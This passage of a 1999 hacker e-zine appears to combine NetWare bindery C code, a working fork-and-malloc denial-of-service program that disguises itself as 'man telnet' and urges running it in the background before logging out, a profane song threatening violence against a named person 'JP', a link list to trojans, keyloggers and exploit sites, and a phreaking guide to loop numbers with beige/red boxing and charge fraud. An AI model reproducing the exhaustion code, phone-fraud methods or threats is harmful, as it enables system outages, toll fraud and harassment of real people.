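    int i, n = 0;
    for (i = 0; i < OBJECTS_PER_SEGMENT; i++) {
        OBJECT_ID oid = read_oid(seg + 4 * i);
        if (oid != 0)
            out[n++] = oid;
    }
    return n;
}

/* Encode up to 32 IDs into one segment, zero-filling the rest. Returns how
   many IDs did not fit, i.e. how many still need a further segment. */
int encode_set_segment(const OBJECT_ID *ids, int count, unsigned char *seg)
{
    int i, n = count < OBJECTS_PER_SEGMENT ? count : OBJECTS_PER_SEGMENT;
    memset(seg, 0, SEGMENT_SIZE);
    for (i = 0; i < n; i++)
        write_oid(seg + 4 * i, ids[i]);
    return count - n;
}

/* Membership test over a set property stored as nSegments consecutive
   segments, e.g. "is this user's ID in the group's GROUP_MEMBERS?". */
int set_contains(const unsigned char *segs, int nSegments, OBJECT_ID oid)
{
    int s, i;
    for (s = 0; s < nSegments; s++)
        for (i = 0; i < OBJECTS_PER_SEGMENT; i++)
            if (read_oid(segs + s * SEGMENT_SIZE + 4 * i) == oid)
                return 1;
    return 0;
}

/* Constructed sample: a GROUP_MEMBERS set with 35 members, which needs two
   segments. Fake IDs 0x01000001..0x01000023 stand in for real ones. */
static unsigned char sample_segs[2 * SEGMENT_SIZE];
static OBJECT_ID     sample_out[OBJECTS_PER_SEGMENT];

int build_sample(void)
{
    OBJECT_ID ids[35];
    int i, left;
    for (i = 0; i < 35; i++)
        ids[i] = 0x01000000u + (OBJECT_ID)i + 1;
    left = encode_set_segment(ids, 35, sample_segs);                  /* 32 fit */
    encode_set_segment(ids + 32, left, sample_segs + SEGMENT_SIZE);   /* last 3 */
    return left;
}

int main(void)
{
    int n;
    build_sample();
    n = decode_set_segment(sample_segs + SEGMENT_SIZE, sample_out);
    printf("second segment holds %d IDs, first of them 0x%08lX\n",
           n, (unsigned long)sample_out[0]);
    printf("0x01000023 is %sa member\n",
           set_contains(sample_segs, 2, 0x01000023u) ? "" : "not ");
    printf("0x01000024 is %sa member\n",
           set_contains(sample_segs, 2, 0x01000024u) ? "" : "not ");
    return 0;
}
```

Walking a real set property means reading segment 1, 2, ... of the property until the server reports no more; the decoder above is applied to each one, and the byte order is the reason a 16-bit DOS program could not simply cast the segment to an OBJECT_ID array and compare.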
------------------------------ begin here ------------------------------

/* structs.h */

#define MSC 510
#define LINT_ARGS   /* netware's prolog.h still thinks it's working with microsoft c 4.0 */

/* The four includes here were NetWare SDK headers; they supply BYTE, WORD,
   IPXAddress, the bindery calls and the completion codes. Their file names
   were lost when this article was extracted and are not guessed. */

#ifndef TRUE
#define TRUE 1
#endif
#ifndef FALSE
#define FALSE 0
#endif

#define FORWARD extern
#define LOCAL   static
#define GLOBAL

#define MAX_OBJECT_NAME_LENGTH   48
#define MAX_PROPERTY_NAME_LENGTH 16
#define SEGMENT_SIZE             128
#define MAX_DIRECTORY_LENGTH     255
#define OT_APPLICATION           0x8001   /* our new object type */

typedef long OBJECT_ID;   /* this has to go here */
#define OBJECTS_PER_SEGMENT (SEGMENT_SIZE / sizeof (OBJECT_ID))

typedef int  BOOL;
typedef BYTE SEGMENT[SEGMENT_SIZE];

typedef struct _OBJECT_ {
    char      szObjectName[MAX_OBJECT_NAME_LENGTH];
    WORD      wObjectType;
    OBJECT_ID oid;
    BYTE      byObjectFlag;
    BYTE      byObjectSecurity;
    BYTE      byPropertiesFlag;
} OBJECT;

typedef struct _ITEM_PROPERTY_ {
    int   nSegments;
    BYTE *pValue;
} ITEM_PROPERTY;

typedef struct _PROPERTY_ {
    char szPropertyName[MAX_PROPERTY_NAME_LENGTH];
    BYTE byPropertyFlags;
    BYTE byPropertySecurity;
    BYTE byValuesFlag;
    union {
        ITEM_PROPERTY iProperty;
        OBJECT_ID    *pObjectList;
    } uPropertyValue;
} PROPERTY;

typedef struct _OBJECT_INFO_ {
    OBJECT    obj;
    PROPERTY *pObjectProperties;   /* array of unknown size */
} OBJECT_INFO;

typedef struct _APPLICATION_OBJECT_ {
    OBJECT     obj;
    char       szPassword[SEGMENT_SIZE];
    WORD       wMaximumUsers;
    char       szApplicationDirectory[2 * SEGMENT_SIZE];
    OBJECT_ID *pAllowedUsers;
    OBJECT_ID *pCurrentUsers;
} APPLICATION_OBJECT;

typedef char SERVER_NAME[MAX_OBJECT_NAME_LENGTH];

typedef struct _WS_CONNECTION_ {
    BYTE byInUseFlag;
    BYTE byOrderNumber;
    BYTE byNetworkNumber[4];
    BYTE byNodeAddress[6];
    BYTE bySocketNumber[2];
    BYTE byReceiveTimeOut[3];
    BYTE byRoutingNode[6];
    BYTE byPacketSequenceNumber;
    BYTE byConnectionNumber;
    BYTE byConnectionStatus;
    BYTE byMaximumTimeOut[2];
    BYTE byPadding[5];
} WS_CONNECTION;

typedef struct _WS_TABLE {
    SERVER_NAME   szServerName;
    WS_CONNECTION wsc;
} WS_TABLE;

typedef struct _FS_CONNECTION_ {
    WORD       wConnectionNumber;
    IPXAddress StationAddress;
    BYTE       byRoutingNode[6];
} FS_CONNECTION;

typedef struct _NW_DATE_AND_TIME_ {
    BYTE byYear;        /* 0 to 99; less than 80 is in the 21st century */
                        /* yes I do realize that when we hit 2000 my program */
                        /* will screw up and stuff */
    BYTE byMonth;
    BYTE byDay;
    BYTE byHour;
    BYTE byMinute;
    BYTE bySecond;
    BYTE byDayOfWeek;   /* 0 to 6, 0 is sunday */
} NW_DATE_AND_TIME;

typedef struct _FS_LOGGED_OBJECT_ {
    WORD             wConnectionNumber;
    OBJECT           obj;
    NW_DATE_AND_TIME nwdtLoginTime;
} FS_LOGGED_OBJECT;

typedef struct _FS_CONNECTION_INFO_ {
    FS_CONNECTION    fsConnection;
    FS_LOGGED_OBJECT fsLoggedObject;
} FS_CONNECTION_INFO;

#include "blahblah.dec"

------------------------------- end here -------------------------------

------------------------------ begin here ------------------------------

/*
 * blahblah.dec - this thing's gonna be used for other stuff I write too
 */

/* gotta have all o' this stuff to define the types, and also for use in a
   program that will be in a later kv issue. Only GetObjectData(),
   GetUserAndAppInfo(), GetConnInfo() and RetrieveApplicationData() are
   referenced by netsniff.c above. */

extern void                DeleteApplication(void);
extern void                AddApplication(void);
extern void                AllowedUsers(int nAction);
extern int                 BinderyCheckCode(int nCompletionCode);
extern int                 CheckObject(OBJECT *pObject, char *pszObjectPassword);
extern int                 CheckCommandLineArgs(char **argv, int argc, int nMaxArgs);
extern int                 CountCurrentUsers(APPLICATION_OBJECT *aop);
extern void                CurrentUsers(void);
extern int                 DeleteObject(OBJECT *pObject);
extern int                 DeleteObjectProperty(OBJECT *pObject, PROPERTY *pProperty);
extern OBJECT             *DestroyObject(OBJECT *pObject);
extern PROPERTY           *DestroyObjectProperty(PROPERTY *pProperty, unsigned short wProperties);
extern int                 GetApplication(APPLICATION_OBJECT *aop);
extern int                 GetUserAndAppInfo(char **argv, int nMaxArgs, OBJECT *pObject, APPLICATION_OBJECT *aop);
extern int                 GetItemOrSet(OBJECT *pObject, PROPERTY *pProperty);
extern OBJECT             *GetObjectData(char *pszObjectName, unsigned short wObjectType);
extern OBJECT_INFO        *GetAllObjectInfo(char *pszObjectName, unsigned short wObjectType);
extern PROPERTY           *GetObjectPropertyData(OBJECT *pObject, char *pszPropertyName);
extern int                 IsUserAllowed(OBJECT *pObject, APPLICATION_OBJECT *aop);
extern int                 IsUsingApplication(OBJECT *pObject, APPLICATION_OBJECT *aop);
extern int                 IsValidName(char *pszObjectName, unsigned short wMaxLength);
extern void                KillNewLine(char *pszString);
extern void                ListUsers(APPLICATION_OBJECT *aop, int nUserType);
extern int                 LinkObjectsInSet(OBJECT *pOwner, OBJECT *pMember, char *pszSetName);
extern int                 RetrieveApplicationData(APPLICATION_OBJECT *aop);
extern int                 SetItemProperty(OBJECT *pObject, PROPERTY *pProperty);
extern int                 SetObjectData(OBJECT *pObject);
extern int                 SetObjectPropertyData(OBJECT *pObject, PROPERTY *pProperty);
extern int                 RemoveObjectFromSet(OBJECT *pOwner, OBJECT *pMember, char *pszSetName);
extern void                UpdateApplication(void);
extern int                 WriteAppDirectory(APPLICATION_OBJECT *aop);
extern FS_CONNECTION_INFO *GetConnInfo(unsigned short wConnectionNumber);
extern FS_CONNECTION_INFO *GetObjectConnInfo(OBJECT *pObject);
extern WS_TABLE           *GetWSTables(void);
extern void                VerifyLoginStatus(APPLICATION_OBJECT *aop);
extern int                 DirCheckCode(int nCompletionCode);

------------------------------- end here -------------------------------

kv[11];    /* Liberty............................................guidob */

/* liberty - this will fill up all available swap and memory if no ulimit
   is set in the kernel, most unix systems that is. it works on all unix
   systems with local access (at least, the ones i tried). no more activity
   is possible after a few seconds this is activated.
                                                              - guidob */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF 4096

void do_malloc(int buf);

int main(int argc, char *argv[])
{
    /* disguise the process in ps output. A longer string than the original
       argv[0] would overflow it, so only rewrite it when it fits. */
    if (argc > 0 && strlen(argv[0]) >= strlen("man telnet"))
        strcpy(argv[0], "man telnet");
    printf("funky malloc() fork() weirdness\n");
    printf("by guidob and CoolVibe\n");
    do_malloc(BUF);
    exit(0);
}

void do_malloc(int buf)
{
    fprintf(stderr, "Doing %d bytes of funky malloc() weirdness\n", buf);
    printf("put this in the background and logout ;)\n");
    if (fork()) {
        /* parent side: every iteration forks again, and each child runs the
           same loop, so the process count doubles while every process keeps
           taking buf more bytes, until a process or memory limit stops it */
        while (1) {
            fork();
            malloc(buf);
        }
    }
    /* the first child falls through and exits normally */
}

[-------------------------------------]

kv[12];    /* Rootfest '99 Review.................................lothos */

kv[13];    /* Ode to JP.......................................krankshaft */

Ode to JP
(sung to the tune of "Ode to My Car", by Adam Sandler)
written by KrankShaft of Legions of the Underground
loved by everyone

Here we go...

Piece of shit media whore
I know a piece of shit whore
That fuckin' sellout
Won't get very far
He's a big piece of shit
He's bound to get fucking shot
JP's going to get broken
I'll tie him in a knot
(He's a piece of shit)

I can't see why he does it
He must be smoking crack
And he smells real bad
Everyone thinks he's really wack
(He's a piece of shit)

Piece of shit media whore
(He's a piece of shit whore)
He sucks royal dick
That fuckin' pile of shit
100% crap
No he won't get very far
Fuck you whore

He's got no friends, and his site is totally jacked
Whoever likes him can lick my sweaty nut sack
(They can bite my ass too)
And he's got no fucking skills
He'd give anyone a blow
Just to hear them say, "I want to be like you, asshole"
(You fuckin' piece of shit)

(Piece of shit media whore)
I know a piece of shit whore
(JP's a piece of shit whore)
I told him to suck my ass
(That fuckin' pile of shit)
That pile of sold-out shit
(He never gets very far)

Oh now what the fuck did he do
What the fuck did he do
What the fuck did he do
To get in the news
You're going to be black and blue
Don't even try to sue
You better try something new
Oh fuck JP

Well he lies like a fucking rug
JP always fucking stalls
And he's gonna get a fat lip
And a swift
kick to the balls
(Ouch ouch ouch)
Plus he tries to get everyone busted
I had to run to a fucking hangar
(He's a pain in my ass)
And if a girlie ever sees this whore
There's no chance he'll ever bang her
(He never ever gets da pussy)

JP shut up
(Piece of shit whore)
You piece of shit whore
(I know a piece of shit media whore)
You piece of shit whore
(Piece of shit whore)
And you call us liars
(You're a piece of shit whore)
Look in the fucking mirror
(Piece of shit whore)
You'll be seven different colors
(You piece of shit media whore)
Fucking crowbar into your lap
(Piece of shit whore)
You'll be puking eve-ry-where
(You're a piece of shit whore)
(Piece of shit whore)
(You're a piece of shit whore)
(Piece of shit whore)
The whole world thinks you're a loser
(You're a piece of shit whore)
Maybe I'll give you a push
(Piece of shit whore...)

[-------------------------------------]

kv[13];    /* Top WWW Sites......................................ntwak0 */

LOU Fast Handy Links
NtWaK0
June 06, 1999

Hello to all my brothers and sisters -;). This time I decided to make something different and handy that can help everyone, a novice or ereet person. After years of experience in the computing field I found out that if we have nice organized ideas/files/links/whatever you want, well, we do our job better and faster and with less stress >> less coffee. So I decided to put out a nice list that contains security information. I will be keeping this up-to-date, and the plan is to have a nice small HTML format file that can be used anywhere you go; just dump it on a diskette or whatever you like. Sorry for the list, I wish I could make it bigger but I had time restrictions. Let IT GROW. ;) I could have put the links in different files, but I wanted to have everything in one file. So your suggestions are more than welcome. Shout-out to all LOU members/friends.

1. Security
2. Tools
3. Search
4. News

Security

* Information
  + http://csrc.nist.gov/secpubs/rainbow
  + Canadian gov information: http://csrc.nist.gov/nistpubs/cc/
  + Electronically OK!: http://eok.net/
  + http://gandalf.isu.edu/security/security.html
  + firewall-wizards messages: http://www.nfr.net/firewall-wizards/
  + http://www.iss.net/xforce/
  + CIAC Bulletins: http://ciac.llnl.gov/ciac/
  + Tips of the month: http://199.44.114.223/rharri/tips.htm
  + http://www.warforge.com/
  + NT security: http://www.txdirect.net/users/wall/ntlinks.htm
  + http://www.fedz.net/
  + http://www.daxion.demon.co.uk/
  + http://www.infilsec.com/
  + http://gandalf.isu.edu/
  + http://www.nfr.net/
  + Security Links UNIX NT etc...: http://www.ntsecurity.net/scripts/loader.asp?iD=/security/ntresources.htm
  + Computers Security information: http://www.alw.nih.gov/Security/security.html
  + COAST Hotlist kudos: http://www.cs.purdue.edu/coast/hotlist/
  + Computer Security Resource Clearinghouse: http://csrc.ncsl.nist.gov/
  + Computer Incident Advisory Capability: http://ciac.llnl.gov/
  + NT FAQ: http://www.ntfaq.com/
  + NT Download Zdnet Site: http://www.zdnet.com/windows/nt/security/ntbugtraq/
  + http://www.trustedsystems.com/
  + http://www.infowar.com/
  + http://www.securezone.com/
  + Computers Consulting Links: http://www.ahandyguide.com/cat1/c/c1305.htm
  + http://www.ntresearch.com/
  + NT Admin Tools: http://www.ntadmintools.com/
  + New dimension security Training: http://www.newdimensions.net
  + Statistics
    o http://nic.merit.edu:/nsfnet/statistics/
    o http://www.hack.gr/cgi-bin/webstats
    o Get a live Internet Traffic Report: http://www.internettrafficreport.com/
    o Web Statistics: http://www.hack.gr/cgi-bin/webstats
    o Crime Security Systems: http://www.crime-freesecurity.com/
  + Unix
    o http://www.users.fast.net/
    o http://w56.ml.org/

* App
  + WatchDog Software (unix): http://www.infstream.com/
  + Reporting Software: http://www.notify.com/audit.htm
  + Netsuite Professional Audit Software: http://www.netsuite.com/cgi/template.pl/site/products/index.html
  + NDG Software's: http://www.comsecltd.com/archive/ndgfile.html
  + aelita enterprise suite: http://www.ntsecurity.com/Products/index.html
  + SeNTry - the Enterprise Event Manager: http://www.missioncritical.com/product/list.htm
  + The MerzScope Sampler: http://www.merzcom.com/prod/scop/sampler.html
  + Hackershield: https://secure.interlog.com/netect/hsblform.htm
  + T-sight: http://www.engarde.com/software/t-sight/index.html
  + NTManage v2.08: http://www.lanware.net/download/
  + Forensic and Security Software: http://www.secure-data.com/tools.html
  + Site Manager Software: http://194.87.208.92/product/bay/network/site.htm
  + RealSecure Software: http://www.iss.net/prod/rs.html
  + Shadoware - Real-Time Network Security Monitoring: http://www.intrusion.com
  + Kane Security Analyst Software: http://www.intrusion.com/product.htm

Tools

* Vulnerability Track
  + http://www.ntsecurity.net/
  + http://www.geek-girl.com/bugtraq/search.html
  + http://www.cert.org/
  + http://www.insecure.org/
  + http://www.iss.net/xforce/
  + Exploit Track: http://www.geek-girl.com/bugtraq/search.html
  + Vulnerability engine: http://www.infilsec.com/cgi-infilsec/if?action=search?
* Crackz
  + http://bmh.underboss.com/cracks.html

* Registry
  + NT Registry Hack: http://www.jsiinc.com/reghack.htm
  + Registry Tips Very Good: http://www.regedit.com/Security/Restrictions_and_Policies/
  + Win 95 Reg Hack: http://www.cnet.com/Content/Features/Howto/Hacks/index.html

* OnLine Tools
  + Hacker Home Page: http://www.cyberarmy.com/
  + Nice search for Hackers: http://ww2.hitbox.com/
  + Get NT user and Group List Using IE: http://209.146.229.2/NTSecurity/default.asp
  + FTP Fast: http://ftpsearch.ntnu.no/
  + Find People anywhere: http://www.worldpages.com/reshome.html/
  + Get a social number USA: http://kadima.com/
  + World Page: http://www.worldpages.com
  + Search for Any domain: http://www.alldomains.com/
  + Whois Server
    o telnet://whois.internic.net/
    o telnet://nic.ddn.mil 43
  + Word list all lang: ftp://sable.ox.ac.uk/pub/wordlists
  + Nameserver Lookup: http://jos.net/projects/nslookup4WWW/nslookup4WWW.html

* List 1
  + http://www.fortrex.com/trn_hacker_tools.htm
  + Windows NT Web Server Tools: http://www.interlacken.com/winnt/ntwebsrv.htm
  + Information Security Resource: http://www.sabernet.net/
  + Script page: http://worldwidemart.com/scripts/
  + http://www.hackersclub.com/km/library
  + http://www.apbonline.com/gfiles/
  + http://www.jabukie.com/
  + Hackers Hall Of Fame: http://eagle2.online.discovery.com/area/technology/hackers/hackers.html
  + http://www.thecodex.com/hacking.html
  + http://www.sysone.demon.co.uk/newhack.htm
  + http://www.bikkel.com/~demoniz/
  + Team 2600 MAC Hacking: http://cyberpunkz.com/team2600/products.html
  + Stealth Keyboard Interceptor: http://www.fortunecity.com/skyscraper/cache/426/key_log.html
  + Snadboy's Revelation: http://www.snadboy.com/Revelation.shtml
  + SATAN Unix: http://www.cs.ruu.nl/cert-uu/satan.html
  + L0pht Crack: http://www.l0pht.com/l0phtcrack/
  + IP Spoofing: http://ryanspc.com/ipspoof.html
  + Trojan Like Bo: http://hax0r.to/deept/
  + Back Orifice: http://www.cultdeadcow.com/tools/
  + Collection of hacking CDROM: http://www.hackershomepage.com/section7.htm
  + Hacking CD: http://members.xoom.com/hackingcd/smallcd.htm
  + Hacker Gold CDROM: http://www.hackerscatalog.com/hackgold.htm
  + Hackershield: https://secure.interlog.com/netect/hsblform.htm
  + http://ds.dial.pipex.com/legends/
  + United Hackers Association: http://205.237.55.207/
  + http://www.hackcanada.com/
  + http://rhino9.ml.org/
  + http://www.genocide2600.com/~tattooman/ADM/
  + http://www.insecure.org/nmap/
  + http://bewoner.dma.be/clan/
  + Linux Project Personal Page Check Often: http://www.cri.cz/kra/index.html
  + Hacking NT Tools: http://www.kull.ch/Bauersachs/cracknt_e.asp
  + tHe w1ck3d k1nGs: http://members.xoom.com/SOSSEC/frames.html
  + The United Council: http://www.unitedcouncil.org/
  + Hacking Tools & Virus: http://home.bip.net/ttorp/enter.html
  + Hacker Club: http://hackersclub.com/km/files/
  + Hide Away: http://www.hideaway.net/
  + http://underground.org
  + http://www.phrack.com
  + http://www.subz3ro.com/
  + 901 check in the future: http://www.901.org/files.html
  + Good site must check often: http://www.fortunecity.com/skyscraper/quantum/488/KiNdReD.html
  + Check Often Phreak and Hack: http://www.johnhead.demon.nl/frames.htm
  + WebFringe Hacker Web Links: http://www.webfringe.com/top100/?progen
  + Microsoft hack files: ftp://ftp.technotronic.com/microsoft/
  + http://www.2600.com/beyondhope/
  + http://www.brd.ie/papers/
  + Magazine 2600 Underground Informer
  + Unix
    o http://www.squirrel.com/squirrel/index.html
    o http://www.users.fast.net/

* List 2
  + http://www.chez.com/rekcah/
  + http://www.altern.org/snem1/frames/
  + http://www.hackersntrackers.com/
  + http://membres.tripod.fr/Hackito/Newtaz.html
  + Active Matrix's Hideaway: http://www.hideaway.net/
  + http://www.clic.net/~hello/puppet/

* Exploits and Search
  + http://www.geek-girl.com/bugtraq/search.html
  + http://www.genocide2600.com/~tattooman/index.shtml
  + http://www.pulhas.org/exploits/
  + http://www.hackcity.com/
  + http://www.real-secure.org/security/exploits/
  + http://www.antioffline.com/
  + http://www.macroshaft.org/noie.html
  + http://www.securitysearch.net/
  + http://adm.freelsd.net/
  + http://www.undersec.com/
  + http://www.raza-mexicana.org
  + http://www.arctik.com
  + http://personales.mundivia.es/sneaker
  + http://homocyberian.cjb.net
  + http://719.cjb.net
  + http://www.sekure.org/english/index.html
  + http://www.cybermedia.co.in/hotnews.htm
  + http://www.securiteam.com/
  + http://www.ntsecurity.net/
  + http://www.networkcommand.com/
  + http://www.attrition.org/errata/
  + http://www.ciac.org/
  + http://www.eeye.com/index.html
  + http://www.alternetive.asso.fr/securite/securiteSoft.htm
  + http://www.insecure.org/
  + http://www.iss.net/xforce/
  + http://www.infilsec.com/cgi-infilsec/if?action=search?
  + http://www.nmrc.org/
  + http://www.technotronic.com/
  + http://www.cookiecentral.com/

Search

* Altavista: http://altavista.digital.com/
* Altavista Translator: http://babelfish.altavista.digital.com/
* HotBot: http://hotbot.com
* DogPile: http://www.dogpile.com/
* 12 Search Engines In One: http://www.800go.com/800go.html
* Deja News: http://www.dejanews.com/
* Handilinks: http://www.handilinks.com/
* Find People Kadima: http://kadima.com/
* World Yellow Pages: http://www.worldpages.com/reshome.html/
* World Yellow Pages: http://www.worldpages.com
* http://www.800go.com/800go.html
* Support Microsoft: http://support.microsoft.com/support/search/c.asp?
* Security Search Engine: http://www.securitysearch.net/
* Country
  + Canada 411: http://canada411.sympatico.ca/index.html
  + St-Bruno: http://www.pageweb.qc.ca/st-bruno/default.htm

News

* http://www.hackernews.com/
* http://www.infowar.com/hacker/hacker.html-ssi
* Hacked Site Archives, archives of hacked sites: http://www.onething.com/archive/
* New Dimension archive of hacked sites: http://www.newdimensions.net/hacktrash.htm
* AntiOnline archive of hacked sites: http://www.antionline.com/archives/pages/
* http://www.wired.com/
* http://innerpulse.com/
* http://www.innerpulsewwwboard.com
* http://www.innerpulsehacks.com
* News Group
  + news://alt.security
  + news://comp.security.announce
  + List of Security List Servers: ListServer.htm
* Magazine
  + Virus 40HEX: http://www.eff.org/pub/Publications/CuD/
  + Safer Magazine: http://www.siamrelay.com/
* Dokumentation des Chaos: http://presse.ccc.de/
* http://www.sans.org/digest.htm

[-------------------------------------]

kv[14];    /* Intro to Loops.....................................hitman */

$Intro.$

Loop numbers can be found in all area codes and are made up primarily of two phone numbers which are usually consecutive. ex;

    201-376-9929
    201-376-9930    (actual working loop number in NJ)

The two numbers are connected and have a constant on-hook voltage. If you called the lower number and your buddy phreak called the higher number you would be instantly connected!
Sort of like a conference table (which mah boy error explains in an issue of A9F4). Anyway, you will know which of the two you are on: if you hear either silence or a loud tone (100hz), that is the low number (through dozens of tests); if you hear a low beep then you are on the higher number.

$The Fun Begins...$

I know by now you are wondering what the hell you need a loop number for, or how to find one; if not, you wouldn't be reading this txt. Having a loop number is one of the numero uno things a field phreak can have, next to a beige/red box. It can offer even more anonymity while talking on the phone. For example, you can either beige box your neighbor's TNI or beige box the splice box around the corner and dial one of the numbers and talk to your waiting friend, and/or red box a payphone and dial, etc. This is one of the greatest things to have if you want to talk to someone other than on an AT&T conference number. You can also place charges on the loop. Say for instance you get on a conf., or maybe the operator asks where she should place the charges. Have your friend be on the loop and tell her the number. Maybe not a good idea, but wtf.

It is very simple but painstakingly hard to scan for loops. One of my tricks is to enter one of your town/city's normal prefixes and then add 99xx. I got around 5 or 6 out of probably 20 attempts. I'm not too sure of the risks of scanning for loops, plus Bell hasn't mailed me anything yet, so I guess it's okay. Just don't be dialing all day. Do a few at a time. Just dial three or four random numbers per day and you can make up a wrong number or "me no speak no English" story.

$In the End...$

Loop numbers can be very fun and useful to anyone who wants the extra stealth when talking about upcoming projects or meetings and such. But they also have their drawbacks, like trying to find loop numbers. So I decided to put a few loop numbers in here from a few NPAs around the country. Some may work and some may not. That's life, dig it.

*****Loop List*****

California
    213-360-1118 $ 213-365-1118
    213-360-1119 $ 213-365-1119

Florida
    305-964-9951 $ 305-778-9952
    305-778-9951 $ 305-964-9952

Michigan
    313-731-9996 $ 313-722-9996
    313-731-9997 $ 313-722-9997

New Jersey
    201-558-9929 $ 201-992-9929
    201-558-9930 $ 201-992-9930

*****Loop List*****

[----------thats all folks-------]

http://www.underzine.com - An LoU joint.....   [www.legions.org]